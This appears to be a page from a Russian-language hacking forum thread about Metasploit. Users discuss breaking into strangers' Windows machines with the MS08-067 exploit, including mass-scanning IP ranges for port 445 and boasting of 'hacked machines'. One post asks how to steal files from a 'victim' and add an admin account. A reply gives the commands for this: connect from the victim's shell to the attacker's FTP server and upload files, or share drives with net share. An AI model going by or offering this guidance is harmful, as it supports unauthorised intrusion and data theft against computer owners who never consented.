Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. NitroM$I

    NitroM$I Member

    Joined:
    15 Feb 2009
    Messages:
    44
    Likes Received:
    11
    Reputations:
    0
    надеюсь то-что нуно

    Code:
    <frameset>
    <frame src="123.php">
    </frameset>
     
  2. Got4A

    Got4A Guest

    Reputations:
    0
    Я тебе скожу ты на это необрощай внимание Windows 2003 server (Russian) English.

    MS08-067 это новейшая уязвимость в Windows XP - Vista, закрыть которую можно только специальным патчем (уязвимы все сервис паки). Т.е. выбирай любой компьютер с windows, и делай с ним что хочешь. Но как обычно, "я тут не причем", сначала получите разрешение у владельца компьютера-цели.


    если что оброщайтеся я сам новечек . ms08-067 по этому способу я могу помочь . а который форуме написа нехрена не получается, и с cp1251 тоже командная строка каракули показывает

    ICQ 259207039
     
  3. Got4A

    Got4A Guest

    Reputations:
    0
    ты гдето вночале прочитай там было можна менять не на IP а на http: .
    а толк какой надо жеподжитать клиента когда он клюнет придется вроде не отключать метасплоит или сесию сворачивать
     
  4. Got4A

    Got4A Guest

    Reputations:
    0
    я какоето виде lsas.rar как угоняет чужой пасс с инета я хотел также применить
    MS08-067 отсюда легче чем на видео но у меня неполучилось в командной страке Ftp залить с моего копа на егошний.
    кто подскажет
     
  5. NitroM$I

    NitroM$I Member

    Joined:
    15 Feb 2009
    Messages:
    44
    Likes Received:
    11
    Reputations:
    0
    не пускает _http://127.0.0.1:55555/ пишет не удалось загрузить страницу ...
    подскажите в чем может быть дело??? делаю все как написано здесь http://takeworld.blogspot.com/2008/11/metasploit-framework-1.html все гладко! но не пускает _http://127.0.0.1:55555/
    вот на чем застрял!

    П.С. сижу под убунта ....

    Зарание блогодарен!
     
  6. NitroM$I

    NitroM$I Member

    Joined:
    15 Feb 2009
    Messages:
    44
    Likes Received:
    11
    Reputations:
    0
    ребята некто не знает? реал неполучается!
     
  7. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    у меня всё получилось на убунту без пробем , Metasploit настроил по этому мануалу Installing Metasploit 3.0 On Ubuntu 7.10
     
    1 person likes this.
  8. NitroM$I

    NitroM$I Member

    Joined:
    15 Feb 2009
    Messages:
    44
    Likes Received:
    11
    Reputations:
    0
    спс!ша попробую!
     
    1 person likes this.
  9. NitroM$I

    NitroM$I Member

    Joined:
    15 Feb 2009
    Messages:
    44
    Likes Received:
    11
    Reputations:
    0
    мсф консоль пашет а мсф веб нет =( ошибка такаяже на два поста выше ... лан хрен сним буду через консоль

    ПС, а может мсф веб не пашет потомучто типа встроеный фаир вол в линуксе блочит? или что-то типа того ?(на линуксе второй день =) )
     
  10. Aza811

    Aza811 New Member

    Joined:
    26 Mar 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Всем доброго дня я знаю что это уже обсуждалось но тем не менее:
    в своей локалке (8 компов) можно залезть к любому при помощи ms08_067_netapi и творить что угодно,но удаленно к кому нибудь ,,войти,, не получается.Пишет гад

    16:36:40 - ms08_067_netapi [*] Automatically detecting the target...
    16:36:45 - ms08_067_netapi [*] Fingerprint: Windows XP Service Pack 2 - lang:Russian
    16:36:45 - ms08_067_netapi [*] Selected Target: Windows XP SP2 Russian (NX)
    16:36:46 - ms08_067_netapi [*] Triggering the vulnerability...

    И все.Редирект вроде настроил с внешнего IP на внутренний.Может не правильно настроил.(сканил XSpiderom открытых 445 портов очень много)Две недели долблюсь.Оч прошу подскажите где затупил
     
  11. _J_O_K_E_R_

    _J_O_K_E_R_ Banned

    Joined:
    30 Mar 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помоему все доступно изложено))) Мне теперь ясно кое что!))) ++ за науку!)))
     
  12. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    Aza811, не все системы с открытым 445 портом уязвимы. атаку может резать фаервол, антивирус.
    в теме описаны случаи с "ms08_067_netapi[*] Triggering the vulnerability...", читай внимательней.
     
  13. Aza811

    Aza811 New Member

    Joined:
    26 Mar 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    В принцепе я прочитал весь FAQ по MFS3.2 и понял одно: все работает все настроено,
    дело в системах с открытым 445 портом,при скане кажется открыт порт-а на самом деле нет,вчера в нете на сайте разработчиков вычитал АФИГИТЕЛЬНУЮ весчь, как можно автоматизировать процес взлома т.е. вводишь начальный IP и конечный IP и ВСЕ пошел курить!!Если есть дырка в 445 порту шелл твой!Таким образом за 20 минут у меня 3 хакнутых машины.Всем респект!!


    пакет Metasploit Framework COOL!!!!
     
  14. NAT_uu

    NAT_uu Elder - Старейшина

    Joined:
    31 Dec 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Aza811

    сылку можно?
     
  15. Lamia

    Lamia Elder - Старейшина

    Joined:
    11 Jul 2007
    Messages:
    186
    Likes Received:
    77
    Reputations:
    -9
    http://metasploit.com/blog/
    Metasploit Mass Exploitation for Dummies (hdm)
     
  16. Aza811

    Aza811 New Member

    Joined:
    26 Mar 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Совершеннно верно! :)
     
  17. Aza811

    Aza811 New Member

    Joined:
    26 Mar 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Здрастя,нужна помощь.Как получить удаленную командную строку я понял,но вот как слить с удаленного компа файлы не въезжаю,одни советуют через FTP (я никогда FTP не пользовался,как его настроить и какая прога нужна?) или может кто подскажет последовательность и ,,правильные,, команды для создания админа у жертвы,обрыл весь Гугл толкового ничего не нашел ,некоторые такую ересь пишут пипец.Хелп ребятки хакерятки!
     
  18. razb

    razb Active Member

    Joined:
    24 Mar 2009
    Messages:
    658
    Likes Received:
    133
    Reputations:
    18
    Подымаешь у ся фтп сервер и конектишся с компа жертвы (ftp xxx.xxx.xxx.xxx) далее вводишь put <file_name> чтобы залить к себе файл. Также можешь расшарить папки(если винда) net share <name>=<disk> и скачать что надо но это палевно.
     
    #238 razb, 1 Apr 2009
    Last edited: 1 Apr 2009
  19. Aza811

    Aza811 New Member

    Joined:
    26 Mar 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0



    Мда,вот это обяснили.Насчет CMD я разобрался, на счет FTP не фига не понял.Объсните бедняжке Aza(чтобы спал спокойно) допустим так:запускаем у себя програму XXX настраеваем так XXX у жертвы в CMD пишем ftp xxx.xxx.xxx.xxx и т.д. Если влом писать даите плиз ссылки.Сенкс.
     
  20. ghostwizard

    ghostwizard Member

    Joined:
    4 Dec 2005
    Messages:
    127
    Likes Received:
    36
    Reputations:
    21
    http://ru.wikipedia.org/wiki/FTP

    RFC 959, RFC 3659